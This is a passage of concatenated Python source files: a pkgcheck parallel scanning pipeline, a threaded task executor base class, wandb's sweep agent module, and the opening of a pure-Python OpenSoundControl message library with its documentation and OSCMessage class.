work_q.put((scope, self.restrict, i))
# insert flags to notify consumers that no more work exists
for i in range(self.jobs):
work_q.put(None)
# schedule all async checks from a single process
for scope, pipes in scoped_pipes['async'].items():
for pipe in pipes:
pipe.run(self.restrict)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
def _run_checks(self, pipes, work_q, results_q):
"""Consumer that runs scanning tasks, queuing results for output."""
try:
for scope, restrict, pipe_idx in iter(work_q.get, None):
if scope is base.version_scope:
results_q.put(list(pipes[scope][pipe_idx].run(restrict)))
elif scope in (base.package_scope, base.category_scope):
results = []
for pipe in pipes[scope]:
results.extend(pipe.run(restrict))
results_q.put(results)
else:
results = []
pipe = pipes[scope][pipe_idx]
pipe.start()
results.extend(pipe.run(restrict))
results.extend(pipe.finish())
results_q.put(results)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
def run(self, results_q):
"""Run the scanning pipeline in parallel by check and scanning scope."""
# initialize checkrunners per source type, using separate runner for async checks
try:
checkrunners = defaultdict(list)
for pipe_mapping in self.pipes:
for (source, exec_type), checks in pipe_mapping.items():
if exec_type == 'async':
runner = AsyncCheckRunner(
self.options, source, checks, results_q=results_q)
else:
runner = CheckRunner(self.options, source, checks)
checkrunners[(source.feed_type, exec_type)].append(runner)
# categorize checkrunners for parallelization based on the scan and source scope
scoped_pipes = defaultdict(lambda: defaultdict(list))
if self.pkg_scan:
for (scope, exec_type), runners in checkrunners.items():
if scope is base.version_scope:
scoped_pipes[exec_type][base.version_scope].extend(runners)
else:
scoped_pipes[exec_type][base.package_scope].extend(runners)
else:
for (scope, exec_type), runners in checkrunners.items():
if scope in (base.version_scope, base.package_scope):
scoped_pipes[exec_type][base.package_scope].extend(runners)
else:
scoped_pipes[exec_type][scope].extend(runners)
work_q = SimpleQueue()
# split target restriction into tasks for parallelization
p = Process(target=self._queue_work, args=(scoped_pipes, work_q, results_q))
p.start()
# run synchronous checks using process pool, queuing generated results for reporting
pool = Pool(self.jobs, self._run_checks, (scoped_pipes['sync'], work_q, results_q))
pool.close()
p.join()
pool.join()
results_q.put(None)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
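# A minimal consumption sketch (hypothetical driver code; the real caller
# lives elsewhere in pkgcheck):
#
#   results_q = SimpleQueue()
#   pipeline = Pipeline(options, scan_scope, pipes, restrict)
#   Process(target=pipeline.run, args=(results_q,)).start()
#   for results in iter(results_q.get, None):
#       if isinstance(results, tuple):
#           exc, tb = results  # a worker died; tb holds its traceback text
#           raise exc
#       for result in results:
#           handle(result)  # `handle` is a placeholder for the reporter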
class CheckRunner:
"""Generic runner for checks.
Checks are run in order of priority. Some checks need to be run before
others if both are enabled due to package attribute caching in pkgcore,
e.g. checks that test depset parsing need to come before other checks that
use the parsed deps; otherwise results from parsing errors could be missed.
"""
def __init__(self, options, source, checks):
self.options = options
self.source = source
self.checks = sorted(checks)
self._running_check = None
scope = base.version_scope
self._known_results = set()
for check in self.checks:
if check.scope < scope:
scope = check.scope
self._known_results.update(check.known_results)
self._itermatch_kwargs = {}
# only use set metadata error callback for version scope runners
if scope is base.version_scope:
self._itermatch_kwargs['error_callback'] = self._metadata_error_cb
self._metadata_errors = deque()
def _metadata_error_cb(self, e):
"""Callback handling MetadataError related results."""
cls = MetadataError.result_mapping.get(e.attr, MetadataError)
process_callback = (
cls is MetadataError or
cls in getattr(self._running_check, 'known_results', self._known_results)
)
if process_callback:
error_str = ': '.join(e.msg().split('\n'))
result = cls(e.attr, error_str, pkg=e.pkg)
self._metadata_errors.append((e.pkg, result))
def start(self):
for check in self.checks:
check.start()
def run(self, restrict=packages.AlwaysTrue):
"""Run registered checks against all matching source items."""
try:
source = self.source.itermatch(restrict, **self._itermatch_kwargs)
except AttributeError:
source = self.source
for item in source:
for check in self.checks:
self._running_check = check
try:
yield from check.feed(item)
except MetadataException as e:
self._metadata_error_cb(e)
self._running_check = None
while self._metadata_errors:
pkg, result = self._metadata_errors.popleft()
# Only show metadata errors for packages matching the current
# restriction to avoid duplicate reports.
if restrict.match(pkg):
yield result
def finish(self):
for check in self.checks:
yield from check.finish()
def __eq__(self, other):
return (
self.__class__ is other.__class__ and
frozenset(self.checks) == frozenset(other.checks))
def __hash__(self):
return hash(frozenset(self.checks))
def __repr__(self):
checks = ', '.join(sorted(str(check) for check in self.checks))
return f'{self.__class__.__name__}({checks})'
class AsyncCheckRunner(CheckRunner):
"""Generic runner for asynchronous checks.
Checks that would otherwise block for uncertain amounts of time due to I/O
or network access are run in separate threads, queuing any relevant results
on completion.
"""
def __init__(self, *args, results_q, **kwargs):
super().__init__(*args, **kwargs)
self.results_q = results_q
def run(self, restrict=packages.AlwaysTrue):
try:
source = self.source.itermatch(restrict, **self._itermatch_kwargs)
except AttributeError:
source = self.source
with ThreadPoolExecutor(max_workers=self.options.tasks) as executor:
futures = {}
for item in source:
for check in self.checks:
check.schedule(item, executor, futures, self.results_q)
|
executor.py
|
"""Server-like task scheduler and processor."""
import abc
import threading
import six
from jarvis.worker import base
RETRY_INTERVAL = 0.1
@six.add_metaclass(abc.ABCMeta)
class Executor(base.Worker):
"""Contract class for all the executors."""
def __init__(self, delay, loop):
super(Executor, self).__init__()
self._queue = []
self._delay = delay
self._loop = loop
self._stop_event = threading.Event()
@abc.abstractmethod
def on_task_done(self, task, result):
"""What to execute after successfully finished processing a task."""
pass
@abc.abstractmethod
def on_task_fail(self, task, exc):
"""What to do when the program fails processing a task."""
pass
@abc.abstractmethod
def on_interrupted(self):
"""What to execute when keyboard interrupts arrive."""
pass
def _get_task(self):
"""Retrieves a task from the queue."""
if self._queue:
return self._queue.pop()
def _work(self, task):
"""Run the received task and process the result."""
# pylint: disable=broad-except
try:
return task.run()
except Exception as exc:
self.on_task_fail(task, exc)
def put_task(self, task):
"""Adds a task to the tasks queue."""
if not isinstance(task, base.Task):
raise ValueError("Invalid type of task provided.")
self._queue.append(task)
def run(self):
"""Processes incoming tasks."""
self.prologue()
while not self._stop_event.is_set():
try:
task = self._get_task()
if task:
self._work(task)
if not self._loop:
break
except KeyboardInterrupt:
self.on_interrupted()
break
self.epilogue()
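# A minimal concrete subclass sketch (hypothetical; assumes base.Worker
# provides prologue()/epilogue() and adds no further abstract hooks):
#
#   class PrintingExecutor(Executor):
#       def on_task_done(self, task, result):
#           print("done:", task, result)
#       def on_task_fail(self, task, exc):
#           print("failed:", task, exc)
#       def on_interrupted(self):
#           self._stop_event.set()
#
#   executor = PrintingExecutor(delay=0.1, loop=False)
#   executor.put_task(some_task)  # some_task must be a base.Task instance
#   executor.run()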
@six.add_metaclass(abc.ABCMeta)
class ConcurrentExecutor(Executor):
"""Abstract base class for concurrent workers."""
def __init__(self, delay, workers_count, queue_size):
"""Instantiates with custom number thread safe objects."""
super(ConcurrentExecutor, self).__init__(delay, workers_count)
self._queue = six.moves.queue.Queue(queue_size)
def _put_task(self, task):
"""Adds a task to the queue."""
self._queue.put(task)
def _get_task(self):
"""Retrieves a task from the queue."""
return self._queue.get()
def _start_worker(self):
"""Create a custom worker and return its object."""
def _worker():
"""Worker able to retrieve and process tasks."""
while not self._stop_event.is_set():
task = self._get_task()
if task:
self._work(task)
worker = threading.Thread(target=_worker)
worker.setDaemon(True)
worker.start()
return worker
@abc.abstractmethod
def task_generator(self):
"""Override this with your custom task generator."""
pass
def on_task_done(self, task, result):
"""What to execute after successfully finished processing a task."""
self._queue.task_done()
def on_task_fail(self, task, exc):
"""What to do when the program fails processing a task."""
pass
def on_interrupted(self):
"""Mark the processing as stopped."""
self._stop_event.set()
super(ConcurrentExecutor, self).on_interrupted()
|
pyagent.py
|
# -*- coding: utf-8 -*-
"""Agent - Agent object.
Manage wandb agent.
"""
from __future__ import print_function
import ctypes
import logging
import os
import socket
import threading
import time
from six.moves import queue
import wandb
from wandb import util
from wandb import wandb_sdk
from wandb.apis import InternalApi
logger = logging.getLogger(__name__)
def _terminate_thread(thread):
if not thread.is_alive():
return
if hasattr(thread, "_terminated"):
return
thread._terminated = True
tid = getattr(thread, "_thread_id", None)
if tid is None:
for k, v in threading._active.items():
if v is thread:
tid = k
if tid is None:
# This should never happen
return
logger.debug("Terminating thread: {}".format(tid))
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(tid), ctypes.py_object(Exception)
)
if res == 0:
# This should never happen
return
elif res != 1:
# Revert
logger.debug("Termination failed for thread {}".format(tid))
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), None)
class Job(object):
def __init__(self, command):
self.command = command
job_type = command.get("type")
self.type = job_type
self.run_id = command.get("run_id")
self.config = command.get("args")
def __repr__(self):
if self.type == "run":
return "Job({},{},{})".format(self.run_id, self.config, self.command)
elif self.type == "stop":
return "stop({})".format(self.run_id)
else:
return "exit"
class RunStatus:
QUEUED = "QUEUED"
RUNNING = "RUNNING"
STOPPED = "STOPPED"
ERRORED = "ERRORED"
DONE = "DONE"
class Agent(object):
FLAPPING_MAX_SECONDS = 60
FLAPPING_MAX_FAILURES = 3
MAX_INITIAL_FAILURES = 5
def __init__(
self, sweep_id=None, project=None, entity=None, function=None, count=None
):
self._sweep_path = sweep_id
self._sweep_id = None
self._project = project
self._entity = entity
self._function = function
self._count = count
# glob_config = os.path.expanduser('~/.config/wandb/settings')
# loc_config = 'wandb/settings'
# files = (glob_config, loc_config)
self._api = InternalApi()
self._agent_id = None
self._max_initial_failures = wandb.env.get_agent_max_initial_failures(
self.MAX_INITIAL_FAILURES
)
# if the directory to log to is not set, set it
if os.environ.get(wandb.env.DIR) is None:
os.environ[wandb.env.DIR] = os.path.abspath(os.getcwd())
def _init(self):
# These are not in constructor so that Agent instance can be rerun
self._run_threads = {}
self._run_status = {}
self._queue = queue.Queue()
self._exit_flag = False
self._exceptions = {}
self._start_time = time.time()
def _register(self):
logger.debug("Agent._register()")
agent = self._api.register_agent(socket.gethostname(), sweep_id=self._sweep_id)
self._agent_id = agent["id"]
logger.debug("agent_id = {}".format(self._agent_id))
def _setup(self):
logger.debug("Agent._setup()")
self._init()
parts = dict(entity=self._entity, project=self._project, name=self._sweep_path)
err = util.parse_sweep_id(parts)
if err:
wandb.termerror(err)
return
entity = parts.get("entity") or self._entity
project = parts.get("project") or self._project
sweep_id = parts.get("name") or self._sweep_id
if sweep_id:
os.environ[wandb.env.SWEEP_ID] = sweep_id
if entity:
wandb.env.set_entity(entity)
if project:
wandb.env.set_project(project)
if sweep_id:
self._sweep_id = sweep_id
self._register()
def _stop_run(self, run_id):
logger.debug("Stopping run {}.".format(run_id))
self._run_status[run_id] = RunStatus.STOPPED
thread = self._run_threads.get(run_id)
if thread:
_terminate_thread(thread)
def _stop_all_runs(self):
logger.debug("Stopping all runs.")
for run in list(self._run_threads.keys()):
self._stop_run(run)
def _exit(self):
self._stop_all_runs()
self._exit_flag = True
# _terminate_thread(self._main_thread)
def _heartbeat(self):
while True:
if self._exit_flag:
return
# if not self._main_thread.is_alive():
# return
run_status = {
run: True
for run, status in self._run_status.items()
if status in (RunStatus.QUEUED, RunStatus.RUNNING)
}
commands = self._api.agent_heartbeat(self._agent_id, {}, run_status)
if commands:
job = Job(commands[0])
logger.debug("Job received: {}".format(job))
if job.type in ["run", "resume"]:
self._queue.put(job)
self._run_status[job.run_id] = RunStatus.QUEUED
elif job.type == "stop":
self._stop_run(job.run_id)
elif job.type == "exit":
self._exit()
return
time.sleep(5)
def _run_jobs_from_queue(self): # noqa:C901
global _INSTANCES
_INSTANCES += 1
try:
waiting = False
count = 0
while True:
if self._exit_flag:
return
try:
try:
job = self._queue.get(timeout=5)
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Exiting.")
return
except queue.Empty:
if not waiting:
logger.debug("Paused.")
wandb.termlog("Sweep Agent: Waiting for job.")
waiting = True
time.sleep(5)
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Exiting.")
return
continue
if waiting:
logger.debug("Resumed.")
wandb.termlog("Job received.")
waiting = False
count += 1
run_id = job.run_id
if self._run_status[run_id] == RunStatus.STOPPED:
continue
logger.debug("Spawning new thread for run {}.".format(run_id))
thread = threading.Thread(target=self._run_job, args=(job,))
self._run_threads[run_id] = thread
thread.start()
self._run_status[run_id] = RunStatus.RUNNING
thread.join()
logger.debug("Thread joined for run {}.".format(run_id))
if self._run_status[run_id] == RunStatus.RUNNING:
self._run_status[run_id] = RunStatus.DONE
elif self._run_status[run_id] == RunStatus.ERRORED:
exc = self._exceptions[run_id]
logger.error("Run {} errored: {}".format(run_id, repr(exc)))
wandb.termerror("Run {} errored: {}".format(run_id, repr(exc)))
if os.getenv(wandb.env.AGENT_DISABLE_FLAPPING) == "true":
self._exit_flag = True
return
elif (
time.time() - self._start_time < self.FLAPPING_MAX_SECONDS
) and (len(self._exceptions) >= self.FLAPPING_MAX_FAILURES):
msg = "Detected {} failed runs in the first {} seconds, killing sweep.".format(
self.FLAPPING_MAX_FAILURES, self.FLAPPING_MAX_SECONDS
)
logger.error(msg)
wandb.termerror(msg)
wandb.termlog(
"To disable this check set WANDB_AGENT_DISABLE_FLAPPING=true"
)
self._exit_flag = True
return
if (
self._max_initial_failures < len(self._exceptions)
and len(self._exceptions) >= count
):
msg = "Detected {} failed runs in a row at start, killing sweep.".format(
self._max_initial_failures
)
logger.error(msg)
wandb.termerror(msg)
wandb.termlog(
"To change this value set WANDB_AGENT_MAX_INITIAL_FAILURES=val"
)
self._exit_flag = True
return
if self._count and self._count == count:
logger.debug("Exiting main loop because max count reached.")
self._exit_flag = True
return
except KeyboardInterrupt:
logger.debug("Ctrl + C detected. Stopping sweep.")
wandb.termlog("Ctrl + C detected. Stopping sweep.")
self._exit()
return
except Exception as e:
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Killed.")
return
else:
raise e
finally:
_INSTANCES -= 1
def _run_job(self, job):
try:
run_id = job.run_id
runqueue_item_id = job.command.get("runqueue_item_id")
config_file = os.path.join(
"wandb", "sweep-" + self._sweep_id, "config-" + run_id + ".yaml"
)
os.environ[wandb.env.RUN_ID] = run_id
os.environ[wandb.env.RUNQUEUE_ITEM_ID] = runqueue_item_id
base_dir = os.environ.get(wandb.env.DIR, "")
sweep_param_path = os.path.join(base_dir, config_file)
os.environ[wandb.env.SWEEP_PARAM_PATH] = sweep_param_path
wandb.wandb_lib.config_util.save_config_file_from_dict(
sweep_param_path, job.config
)
os.environ[wandb.env.SWEEP_ID] = self._sweep_id
wandb_sdk.wandb_setup._setup(_reset=True)
wandb.termlog("Agent Starting Run: {} with config:".format(run_id))
for k, v in job.config.items():
wandb.termlog("\t{}: {}".format(k, v["value"]))
self._function()
wandb.finish()
except KeyboardInterrupt as ki:
raise ki
except Exception as e:
wandb.finish(exit_code=1)
if self._run_status[run_id] == RunStatus.RUNNING:
self._run_status[run_id] = RunStatus.ERRORED
self._exceptions[run_id] = e
finally:
# clean up the environment changes made
os.environ.pop(wandb.env.RUN_ID, None)
os.environ.pop(wandb.env.RUNQUEUE_ITEM_ID, None)
os.environ.pop(wandb.env.SWEEP_ID, None)
os.environ.pop(wandb.env.SWEEP_PARAM_PATH, None)
def run(self):
logger.info(
"Starting sweep agent: entity={}, project={}, count={}".format(
self._entity, self._project, self._count
)
)
self._setup()
# self._main_thread = threading.Thread(target=self._run_jobs_from_queue)
self._heartbeat_thread = threading.Thread(target=self._heartbeat)
self._heartbeat_thread.daemon = True
# self._main_thread.start()
self._heartbeat_thread.start()
# self._main_thread.join()
self._run_jobs_from_queue()
def pyagent(sweep_id, function, entity=None, project=None, count=None):
"""Generic agent entrypoint, used for CLI or jupyter.
Arguments:
sweep_id (dict): Sweep ID generated by CLI or sweep API
function (func, optional): A function to call instead of the "program"
entity (str, optional): W&B Entity
project (str, optional): W&B Project
count (int, optional): the number of trials to run.
"""
if not callable(function):
raise Exception("function paramter must be callable!")
agent = Agent(
sweep_id, function=function, entity=entity, project=project, count=count,
)
agent.run()
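# Usage sketch (hypothetical sweep id and objective function):
#
#   def train():
#       wandb.init()
#       wandb.log({"loss": 0.0})
#
#   pyagent("entity/project/sweep_id", train, count=1)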
_INSTANCES = 0
def is_running():
return bool(_INSTANCES)
|
OSC2.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
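# For reference, converting a unix timestamp t into the two NTP timetag fields
# amounts to:
#   secs = int(t) - NTP_epoch                     # NTP_epoch is negative, so this adds ~70 years
#   frac = int((t % 1.0) * NTP_units_per_second)  # fractional seconds in 1/2**32 units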
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
	On the Python end, OSCMessages are lists of arguments, preceded by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
	Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
	def __repr__(self):
		"""Returns a string containing the decoded Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
	def __setitem__(self, i, val):
		"""Set the indicated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
	def index(self, val):
		"""Returns the index of the first occurrence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
			raise ValueError("'%s' not in OSCMessage" % str(val))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
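# Illustrative sketch, not part of the original module: how the typetag accessors and the
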